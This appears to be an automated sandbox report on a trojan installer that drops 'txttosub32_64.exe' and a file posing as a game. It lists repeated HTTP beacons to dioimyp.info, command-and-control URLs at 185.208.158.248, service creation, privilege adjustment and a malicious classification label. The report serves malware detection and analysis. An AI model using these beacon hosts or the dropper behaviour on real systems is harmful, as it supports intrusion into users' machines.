        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficDNS traffic detected: DNS query: dioimyp.info
        Source: txttosub32_64.exe, 00000002.00000002.2985433217.0000000000B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/
        Source: txttosub32_64.exe, 00000002.00000002.2987911275.0000000003392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee948
        Source: txttosub32_64.exe, 00000002.00000002.2985433217.0000000000B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
        Source: JtDj8LXROa.exe, 00000000.00000003.1729957915.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000002.2985052299.0000000002088000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2985152205.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000003.1733440877.000000000227C000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000003.1732936599.0000000003230000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2985568481.000000000226C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://fsf.org/
        Source: is-044SQ.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: is-FNN9L.tmp.1.drString found in binary or memory: http://tukaani.org/
        Source: is-FNN9L.tmp.1.drString found in binary or memory: http://tukaani.org/xz/
        Source: JtDj8LXROa.exe, 00000000.00000003.1729957915.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000002.2985052299.0000000002088000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2985152205.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000003.1733440877.000000000227C000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000003.1732936599.0000000003230000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2985568481.000000000226C000.00000004.00001000.00020000.00000000.sdmp, is-HL3OV.tmp.1.drString found in binary or memory: http://www.gnu.org/licenses/
        Source: JtDj8LXROa.exeString found in binary or memory: http://www.innosetup.com
        Source: is-3J7FL.tmp, is-3J7FL.tmp, 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-APE3N.tmp.1.dr, is-3J7FL.tmp.0.drString found in binary or memory: http://www.innosetup.com/
        Source: JtDj8LXROa.exe, 00000000.00000003.1730578339.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000003.1730772731.0000000002094000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmp, is-APE3N.tmp.1.dr, is-3J7FL.tmp.0.drString found in binary or memory: http://www.innosetup.comDVarFileInfo$
        Source: JtDj8LXROa.exe, 00000000.00000003.1730578339.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000003.1730772731.0000000002094000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, is-3J7FL.tmp, 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-APE3N.tmp.1.dr, is-3J7FL.tmp.0.drString found in binary or memory: http://www.remobjects.com/?ps
        Source: JtDj8LXROa.exe, 00000000.00000003.1730578339.0000000002320000.00000004.00001000.00020000.00000000.sdmp, JtDj8LXROa.exe, 00000000.00000003.1730772731.0000000002094000.00000004.00001000.00020000.00000000.sdmp, is-3J7FL.tmp, 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-APE3N.tmp.1.dr, is-3J7FL.tmp.0.drString found in binary or memory: http://www.remobjects.com/?psU

        System Summary

        barindex
        Source: txttosub32_64.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: Eurofighter Typhoon Game 10.8.45.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00423AFC NtdllDefWindowProc_A,1_2_00423AFC
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00412550 NtdllDefWindowProc_A,1_2_00412550
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045483C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_0045483C
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_00401A4F: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,2_2_00401A4F
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_00409088 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409088
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00453298 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00453298
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_004081FC0_2_004081FC
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004346A41_2_004346A4
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00468A781_2_00468A78
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004610581_2_00461058
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00475D101_2_00475D10
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004302481_2_00430248
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004444DC1_2_004444DC
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004448E81_2_004448E8
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045ABB81_2_0045ABB8
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0046305C1_2_0046305C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0043D0C41_2_0043D0C4
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0047B1101_2_0047B110
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0048169C1_2_0048169C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0042F7EC1_2_0042F7EC
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0044383C1_2_0044383C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004339A01_2_004339A0
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00457CDC1_2_00457CDC
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00443DE41_2_00443DE4
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_004010512_2_00401051
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_00401C262_2_00401C26
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DAE18D2_2_02DAE18D
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DA9E842_2_02DA9E84
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DB4E292_2_02DB4E29
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02D9EFAD2_2_02D9EFAD
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DADC992_2_02DADC99
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DA84422_2_02DA8442
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DAAC3A2_2_02DAAC3A
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DB2DB42_2_02DB2DB4
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DAE5A52_2_02DAE5A5
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DCBCEB2_2_02DCBCEB
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DCB4E52_2_02DCB4E5
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DCBD582_2_02DCBD58
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 00403418 appears 60 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 00451298 appears 63 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 00405974 appears 92 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 004034AC appears 81 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 00406A10 appears 33 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 00454E8C appears 90 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 00445418 appears 58 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 00408B90 appears 42 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 00407878 appears 37 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 004338B8 appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 0040369C appears 194 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 00445148 appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: String function: 0045507C appears 49 times
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: String function: 02DA8AE0 appears 37 times
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: String function: 02DB5330 appears 139 times
        Source: is-3J7FL.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-3J7FL.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: is-3J7FL.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-3J7FL.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-APE3N.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-APE3N.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: is-APE3N.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-APE3N.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-OINQS.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-MIIEA.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-044SQ.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-UDOMJ.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-4PF6P.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-FNN9L.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-JLHGP.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-QL93H.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-45KG3.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-HL3OV.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-S3DSP.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: JtDj8LXROa.exe, 00000000.00000003.1730578339.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs JtDj8LXROa.exe
        Source: JtDj8LXROa.exe, 00000000.00000003.1730578339.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs JtDj8LXROa.exe
        Source: JtDj8LXROa.exe, 00000000.00000003.1730772731.0000000002094000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs JtDj8LXROa.exe
        Source: JtDj8LXROa.exe, 00000000.00000003.1730772731.0000000002094000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs JtDj8LXROa.exe
        Source: JtDj8LXROa.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: txttosub32_64.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: _setup64.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Eurofighter Typhoon Game 10.8.45.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: classification engineClassification label: mal100.troj.evad.winEXE@5/69@1/2
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DA08B8 FormatMessageA,GetLastError,2_2_02DA08B8
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_00409088 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409088
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00453298 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00453298
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00453AC8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00453AC8
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: CreateServiceA,2_2_0040B04C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00453EB0 CoCreateInstance,CoCreateInstance,SysFreeString,1_2_00453EB0
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_0040979C FindResourceA,SizeofResource,LoadResource,LockResource,0_2_0040979C
